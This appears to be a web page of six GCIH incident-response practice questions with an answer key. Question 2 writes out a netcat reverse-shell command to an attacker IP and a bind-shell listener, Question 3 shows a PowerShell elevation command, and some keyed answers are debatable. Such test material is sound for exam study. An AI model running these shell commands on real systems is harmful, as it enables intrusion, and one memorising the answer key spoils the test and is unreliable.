Free GCIH Incident Response & Cyber Investigation Practice Test 2026 — GIAC Incident Handler Questions

This free GCIH Incident Response & Cyber Investigation practice test covers incident response and cyber investigation — the PICERL lifecycle (Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned), evidence handling, chain of custody, and IR documentation. Each question includes a detailed explanation — perfect for GIAC Certified Incident Handler / SANS SEC504 exam prep.

6 Free GCIH Incident Response & Cyber Investigation Practice Questions with Answers

Sample Question 1 — Incident Response and Cyber Investigation

During an incident response, what is the correct order of steps in the PICERL methodology?

  A. Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned (Correct answer)
  B. Identification, Preparation, Containment, Eradication, Recovery, Lessons Learned
  C. Preparation, Containment, Identification, Eradication, Recovery, Lessons Learned
  D. Identification, Containment, Preparation, Eradication, Recovery, Lessons Learned

Correct answer: A

Explanation: PICERL stands for Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. This is the standard incident response methodology used by security teams to systematically handle cybersecurity incidents.

Sample Question 2 — Incident Response and Cyber Investigation

During an incident response investigation, you suspect that a compromised system is being used for data exfiltration through a covert channel. You find evidence of Netcat being used on the system. Which of the following Netcat commands would most likely indicate a reverse shell used for data exfiltration?

  A. nc -lvp 4444 -e /bin/bash
  B. nc -e /bin/bash 192.168.1.100 4444 (Correct answer)
  C. nc 192.168.1.100 4444 < /dev/null
  D. nc -l -p 4444 > output.txt

Correct answer: B

Explanation: Option B represents a reverse shell initiated by the compromised system, connecting back to the attacker's machine at IP address 192.168.1.100 on port 4444 and executing /bin/bash. This is a common method for establishing a covert channel for data exfiltration. Option A is a listener command, which is not used for initiating a reverse connection. Option C is a simple TCP connection that doesn't execute a shell. Option D is a listener that writes incoming data to a file, not a reverse shell.

Sample Question 3 — Incident Response and Cyber Investigation

You are part of an incident response team investigating a suspected case of privilege escalation on a Windows server. During your analysis, you notice unusual PowerShell activity in the logs. Which of the following PowerShell commands is most likely used for privilege escalation?

  A. Get-Process | Out-File -FilePath processes.txt
  B. Invoke-Expression -Command 'Start-Process PowerShell -Verb RunAs' (Correct answer)
  C. Get-Content -Path C:\Windows\System32\drivers\etc\hosts
  D. Set-ExecutionPolicy RemoteSigned

Correct answer: B

Explanation: Option B uses 'Invoke-Expression' to run a PowerShell process with elevated privileges ('-Verb RunAs'), which is a common technique for privilege escalation. Option A simply outputs process information to a file and does not involve privilege escalation. Option C reads the hosts file, which is not related to privilege escalation. Option D changes the execution policy for scripts but does not directly escalate privileges.

Sample Question 4 — Incident Response and Cyber Investigation

A financial institution's network monitoring system has detected unusual outbound traffic from a critical server. As the incident handler, what is the most effective initial action you should take to investigate this incident?

  A. Immediately disconnect the server from the network to prevent data exfiltration.
  B. Use Wireshark to capture and analyze the network traffic from the server. (Correct answer)
  C. Run a full antivirus scan on the server to check for malware.
  D. Check the server's firewall logs for any unauthorized access attempts.

Correct answer: B

Explanation: The most effective initial action is to use Wireshark to capture and analyze the network traffic from the server (Option B). This step allows you to understand the nature of the outbound traffic, identify potential data exfiltration, and gather evidence without immediately disrupting operations. Disconnecting the server (Option A) might be necessary later but could destroy volatile evidence and disrupt business processes. Running an antivirus scan (Option C) is a good step for later in the investigation but won't provide immediate insight into the network activity. Checking firewall logs (Option D) could be useful but may not directly address the unusual outbound traffic issue.

Sample Question 5 — Incident Response and Cyber Investigation

During an incident response, you notice unusual outbound traffic from a critical server. What is the most effective initial action to take?

  A. Shut down the server immediately to prevent data exfiltration.
  B. Capture a packet trace using Wireshark to analyze the traffic. (Correct answer)
  C. Conduct a full vulnerability scan on the server using Nmap.
  D. Notify management and await further instructions.

Correct answer: B

Explanation: Capturing a packet trace with Wireshark is the most effective initial action because it allows you to analyze the traffic in real-time and gather evidence without disrupting the server's operations. Shutting down the server (Option A) may prevent further exfiltration but also destroys volatile evidence. Conducting a full vulnerability scan (Option C) is not an immediate action and could disrupt the server. Notifying management (Option D) is important, but it should be done concurrently with immediate evidence gathering.

Sample Question 6 — Incident Response and Cyber Investigation

You are the first responder to a suspected malware infection on a workstation. What is the best first step you should take?

  A. Isolate the workstation from the network. (Correct answer)
  B. Delete the suspicious files.
  C. Run a full antivirus scan.
  D. Reboot the workstation in safe mode.

Correct answer: A

Explanation: Isolating the workstation from the network is the best first step as it prevents the potential spread of malware to other systems while preserving the current state for further analysis. Deleting files (Option B) could destroy evidence. Running a full antivirus scan (Option C) is useful but should be done after isolation to prevent further spread. Rebooting in safe mode (Option D) could alter the system state and is not an immediate containment action.
